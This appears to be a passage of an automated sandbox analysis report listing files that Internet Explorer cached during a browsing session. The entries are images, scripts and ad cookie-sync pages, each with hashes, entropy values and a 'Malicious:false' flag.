                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12647
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.85688555467823
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:NZmUdFnjyddstPBDHHReN/KzQxsx9yIYt79:NEKjyktpnM/6QCP4b
                                                                                                                                                                                                                                                                                  MD5:7EC15FC40F0D6E5943748B87C3FD2439
                                                                                                                                                                                                                                                                                  SHA1:6AA52A7FF29050780E2C7803CEAD16D1EE388725
                                                                                                                                                                                                                                                                                  SHA-256:9765960620FA9290C64F0F2AB3266D174DF6B8CDC45C8981DD6C856A49522874
                                                                                                                                                                                                                                                                                  SHA-512:10E19EF476CCC30B560EF1790953CC3AA3B585C53BCDAD360A32471A2128D9A05BC97299596FD6146C7D7766ADB51BB145FA7121066918C596DF3733E5E7C2AB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaEWW[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12315
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.952955222756471
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:0AO9mu1kHg4MX5foV+VBv5JB/KWFcdgrz:0Abu1kAr1v5nSWggn
                                                                                                                                                                                                                                                                                  MD5:7FDF90FB5EB1D053FE913C49E67F986B
                                                                                                                                                                                                                                                                                  SHA1:7AE44AF78BE82C5E63947EECEC5DFC943172C01B
                                                                                                                                                                                                                                                                                  SHA-256:DE069FDB5B80C77FF29CBDBCA2FAC199C8DAAC58842E041AE4A65D6311E84EE4
                                                                                                                                                                                                                                                                                  SHA-512:F4BB5AC10599376555DCAC574256ED7F696DC72092C956FB4230685CE47141FC2972AA774C3ADF2BD5F72718FCEAE74F94C1B916974709FA5EC74A94C421388F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaKlK[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1288
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.378586675757247
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:QI/OtlM0XxDuLHeOWXG427DAJuLHenX3MuPd/u/b4phZbBEbseMlKV+:QfAuETAauPdmT4jDEbsmV+
                                                                                                                                                                                                                                                                                  MD5:DF7C62E6B90FBD14794F2E2E8FDDDC80
                                                                                                                                                                                                                                                                                  SHA1:884D83F6D52DD94BA99CDA6C9D19D72B5D20B3B0
                                                                                                                                                                                                                                                                                  SHA-256:3350BCBA49CD0655166194429790717F505713555D60B98209B68458EB0864C2
                                                                                                                                                                                                                                                                                  SHA-512:5EBA5A9A755F7BB6CA5DC18DCD7FF7339B0A5809C6720796FA28CBC9838E1B77286ED9E6535949CBFCE51D5330062915EAF6D7E211944A9494F5C4C56D4EE7EF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaLRV[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29167
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.921884697743823
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:IkxG+b1rWbw+wPaRm5RVatvHjQ1nYFXFrSV6ET:IkxG+blgOPaWC81nYxF1ET
                                                                                                                                                                                                                                                                                  MD5:A60C016C25D8FE136E3E2520BE7CE1DB
                                                                                                                                                                                                                                                                                  SHA1:30C1A8105D66A5C2C495E5691AC99207C2962C1D
                                                                                                                                                                                                                                                                                  SHA-256:EF20D6527BD47D403590E703B67B2D1CCB167019EDEE80F9D8B413F8A054EE43
                                                                                                                                                                                                                                                                                  SHA-512:4921AC55C753AB948E84245A21D1A5EDA2064F1BDD32E9B2AE64A2EC9101463CA0699D7C897A3D2D6FA1951A9926C2D468547352DF0B5533AA308196BF949620
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPadFc[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13116
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.962182391452064
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:Qo7aEn6bsrrbWbcEFgKk14/ep/GycMSAfLnIBNYRwu12pMCFr4/4SNERXWVByK+6:b9EFgKk14/Spxmi12pM68F6XWVBJdNv5
                                                                                                                                                                                                                                                                                  MD5:B421478D0D530DE09B7796BB070BD2D4
                                                                                                                                                                                                                                                                                  SHA1:787FD68F11749377F88DBB46C145DFB026968871
                                                                                                                                                                                                                                                                                  SHA-256:F85480723A178582BD3E4F7401F7DDDCE4D6E088889D2569FD77A7127AC800C5
                                                                                                                                                                                                                                                                                  SHA-512:647D86545C480A429E1D18A3671CB2565F6AF62E7439E2CC235D3A2ED9BC857CBDB8DE117E64185C2D125178CDF7477B081C84015AC3753C1F40076AD69FE443
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaiCX[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20400
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.955007668006029
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:NNt3qUuoIgPRSYRsUcegu8JNInv2X5VHtyCGdfQYfGQ:NNR7uoIg2jPujKbN0JGQ
                                                                                                                                                                                                                                                                                  MD5:8235BC0F2EF0A960A0D2A244D4E25145
                                                                                                                                                                                                                                                                                  SHA1:4EFC5E86680E82C752C5BA1815272A49E7E4FD4D
                                                                                                                                                                                                                                                                                  SHA-256:A34704EECDBA02E65E424B137B8AEF704F182F7A0EF78F08E7AF48637B1DB963
                                                                                                                                                                                                                                                                                  SHA-512:F762B17BF03F645EFCC2208F57A99A286128C136A9CED778C88EF4ABDBF7EAA6C8F1FF07EAEC75B6963BBCACDD8039272D1B04F1A3BA27DFCCC004858DD39A35
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaldW[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6119
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.784668519065917
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:QfQENXqaS/ZtChQjS60jP4bmYF5dYpcoYSCKXl6y+NA5M3MS5c1ImCd7CtxFBZUe:QogXVS/PMQjGe7/WPcC412qP4txvZUfG
                                                                                                                                                                                                                                                                                  MD5:EE406C40CE6EB0ACE1FC06BB1EAE744A
                                                                                                                                                                                                                                                                                  SHA1:BD24629A4AD1DF2ADE70A00FF8C23176AD63D5F6
                                                                                                                                                                                                                                                                                  SHA-256:F35666C1C5790DCD4B2396C6D01CA83CA2EB68EBAF4F26222D1E910FC6EAD1CE
                                                                                                                                                                                                                                                                                  SHA-512:98B96D9CC68CC33748A0C10A2CA9A3B964F9B5833812099127186526F1C4E7533383E875FE4240365800DD74A5EBF1DF7DE77C9DFC68A4703EA77C22798ED79F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaqLI[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.804305344516817
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:QI/OtlM0XxDuLHeOWXG427DAJuLHenX3dtHY44lZZvjaToaIwaNKBGGU71L6ve0S:QfAuETAV4XvjtSIMiBjyiSAdx9dFhw4
                                                                                                                                                                                                                                                                                  MD5:8F3FB279A342E21D473EF1E314A04A57
                                                                                                                                                                                                                                                                                  SHA1:104F18CD83DE1DE6DF57462CDED9A245F97202AB
                                                                                                                                                                                                                                                                                  SHA-256:BA60350C406B8698C73709FD0D9A061F18AD049AA2BE17345A23B56BEA389B6D
                                                                                                                                                                                                                                                                                  SHA-512:1B1596AB0B677824F82B75708F34F281F889D6BE21CBDA292976FDB99E3E46E21A987CB21FE27697319FA81647561B7490DD42C8EE80A3D6219480D80C7E377A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPatbE[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14836
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.385116017861641
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:Qnuf1h2EzAfTSRtavnTFYBW/3epwN6qGP4j/+CXDNuGGd96LujZe4VjJZ18k7G5:IufmEzAgKFYg/3epwiAX5/G8wC5
                                                                                                                                                                                                                                                                                  MD5:34452E3D2D8D9CB813B632E5C46BA44E
                                                                                                                                                                                                                                                                                  SHA1:7E7FCDAFAD1C28EC7A20BEE260916CE833C9AE60
                                                                                                                                                                                                                                                                                  SHA-256:397372C30640074DB04805A098E40C733774E754D676638DF60D856CEB7F3D55
                                                                                                                                                                                                                                                                                  SHA-512:FF9E6116739F369DCCC69630DFC6E47F9701618B46C2F22EE283713D0CB018B15968F4C0C02D5C8651CD049F9328EC780B9CCAD775F604BC7D3138846D732606
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB15AQNm[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29565
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9235998300887145
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:I1cMsjB7+C2bbAEB2SUZRT+kXoMRRJhp5xvHapIzf7m41tgaYi9PIVKnHNVMP2Nm:IHsjkC2YEB2SUPTT48FPHTgf3VKn2Uc
                                                                                                                                                                                                                                                                                  MD5:6B79D1438D8EFAF3B8DE6163107CEC71
                                                                                                                                                                                                                                                                                  SHA1:E54E651A8A0FDAFCAD60B137D806D8CEC2F769C0
                                                                                                                                                                                                                                                                                  SHA-256:2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
                                                                                                                                                                                                                                                                                  SHA-512:745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1cEP3G[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1088
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.81915680849984
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                                                                                                                                                                                                                                                                  MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                                                                                                                                                                                                                                                                  SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                                                                                                                                                                                                                                                                  SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                                                                                                                                                                                                                                                                  SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB6Ma4a[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):368
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.811857078347448
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                                                                                                                                                                                                                                                                  MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                                                                                                                                                                                                                                                                  SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                                                                                                                                                                                                                                                                  SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                                                                                                                                                                                                                                                                  SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBVuddh[2].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):316
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.917866057386609
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
                                                                                                                                                                                                                                                                                  MD5:636BACD8AA35BA805314755511D4CE04
                                                                                                                                                                                                                                                                                  SHA1:9BB424A02481910CE3EE30ABDA54304D90D51CA9
                                                                                                                                                                                                                                                                                  SHA-256:157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
                                                                                                                                                                                                                                                                                  SHA-512:7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBY7ARN[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):779
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.670456272038463
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                                                                                                                                                                                                                                                                  MD5:30801A14BDC1842F543DA129067EA9D8
                                                                                                                                                                                                                                                                                  SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                                                                                                                                                                                                                                                                  SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                                                                                                                                                                                                                                                                  SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\a5ea21[1].ico
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):758
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.432323547387593
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                                                                                                  MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                                                                                                  SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                                                                                                  SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                                                                                  SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[1].htm
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):27135
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.33237304261757
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:pBNY7cAGcVXlblcqnzleZS57naMh6eg2f5ng1h7/V99qQWwY4RXrqt:p/r86qhbc2Rsh7/V/qQWwY4RXrqt
                                                                                                                                                                                                                                                                                  MD5:2C50DB6096770441093C246D675D2E89
                                                                                                                                                                                                                                                                                  SHA1:67C562A49E8C20A9C184FB158111B3DD4C3BD8FF
                                                                                                                                                                                                                                                                                  SHA-256:303267EF7E63A88E2D2F0856D259E796F2ED213D3DB4D4B5240B11915C6EEE4F
                                                                                                                                                                                                                                                                                  SHA-512:4B9F81C3995875D252D26FE69E6E60C649A52BA06734E693A1C90AD72F62987F44651B3F52878D4BC45ED8F342B5C160B527BDA0741539A3ED0BD0B2E3E9ED91
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"ZA","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","time":14,"cookie":"data-g","urls":[{"type":"img","url":"https:\/\/cm.g.doubleclick.net\/pixel?cs=1&google_nid=media&google_cm=1&google_hm=<encb64vsid>&google_sc=1"}],"pvid":77,"isBl":0,"g":1,"cocs":0},"bs":{"name":"bs","time":364,"cookie":"data-bs","urls":[{"type":"img","url":"https:\/\/x.bidswitch.net\/sync?ssp=medianet&gdpr=${GDPR}&gdpr_consent=${GDPR_CONSENT}&gdpr_pd=1"}],"pvid":109,"isBl":0,"g":1,"cocs":0},"vzn":{"name":"vzn","time":365,"cookie":"data-v","urls":[{"type":"img","url":"https:\/\/contextual.media.net\/cksync.php?cs=1&type=vzn&ovsid={{APID}}&redirect=https%3A%2F%2Fpixel.advertising.com%2Fups%2F58222%2Fsync%3F_origin%3D1%26uid%3D%24UID"}],"pvid":184,"isBl":0,"g":0,"cocs":0},"brx":{"name":"brx","time":365,"cook
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[2].htm
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):27135
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.33237304261757
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:pBNY7cAGcVXlblcqnzleZS57naMh6eg2f5ng1h7/V99qQWwY4RXrqt:p/r86qhbc2Rsh7/V/qQWwY4RXrqt
                                                                                                                                                                                                                                                                                  MD5:2C50DB6096770441093C246D675D2E89
                                                                                                                                                                                                                                                                                  SHA1:67C562A49E8C20A9C184FB158111B3DD4C3BD8FF
                                                                                                                                                                                                                                                                                  SHA-256:303267EF7E63A88E2D2F0856D259E796F2ED213D3DB4D4B5240B11915C6EEE4F
                                                                                                                                                                                                                                                                                  SHA-512:4B9F81C3995875D252D26FE69E6E60C649A52BA06734E693A1C90AD72F62987F44651B3F52878D4BC45ED8F342B5C160B527BDA0741539A3ED0BD0B2E3E9ED91
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[3].htm
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):27135
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.33237304261757
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:pBNY7cAGcVXlblcqnzleZS57naMh6eg2f5ng1h7/V99qQWwY4RXrqt:p/r86qhbc2Rsh7/V/qQWwY4RXrqt
                                                                                                                                                                                                                                                                                  MD5:2C50DB6096770441093C246D675D2E89
                                                                                                                                                                                                                                                                                  SHA1:67C562A49E8C20A9C184FB158111B3DD4C3BD8FF
                                                                                                                                                                                                                                                                                  SHA-256:303267EF7E63A88E2D2F0856D259E796F2ED213D3DB4D4B5240B11915C6EEE4F
                                                                                                                                                                                                                                                                                  SHA-512:4B9F81C3995875D252D26FE69E6E60C649A52BA06734E693A1C90AD72F62987F44651B3F52878D4BC45ED8F342B5C160B527BDA0741539A3ED0BD0B2E3E9ED91
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\e151e5[1].gif
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.122191481864228
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                                                                                                  MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                                                                                                  SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                                                                                                  SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                                                                                                  SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\otBannerSdk[1].js
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):374818
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.338137698375348
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
                                                                                                                                                                                                                                                                                  MD5:2E5F92E8C8983AA13AA99F443965BB7D
                                                                                                                                                                                                                                                                                  SHA1:D80209C734F458ABA811737C49E0A1EAF75F9BCA
                                                                                                                                                                                                                                                                                  SHA-256:11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
                                                                                                                                                                                                                                                                                  SHA-512:A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\52-478955-68ddb2ab[1].js
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):397470
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3243063622496525
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:YXP9M/wSg/Ms1J1Kb4K7hmnidHWPqIjHSja3Cr1BgxO0DkV4FcjtIuNK:CW/dcnidHWPqIjHdi16tbcjut
                                                                                                                                                                                                                                                                                  MD5:9D766F4A32590647C9378BCE9B370BC3
                                                                                                                                                                                                                                                                                  SHA1:D0328B82B0F75E3DC87A039D53A710D593E068CF
